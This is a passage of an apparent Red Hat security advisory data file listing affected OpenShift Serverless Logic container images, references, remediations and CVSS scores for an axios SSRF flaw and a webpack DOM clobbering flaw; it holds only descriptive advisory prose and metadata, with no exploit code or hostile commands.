"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-39338", }, { category: "external", summary: "RHBZ#2304369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304369", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-39338", url: "https://www.cve.org/CVERecord?id=CVE-2024-39338", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", }, { category: "external", summary: "https://github.com/axios/axios/releases", url: "https://github.com/axios/axios/releases", }, { category: "external", summary: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", url: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", }, ], release_date: "2024-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "axios: axios: Server-Side Request Forgery", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", 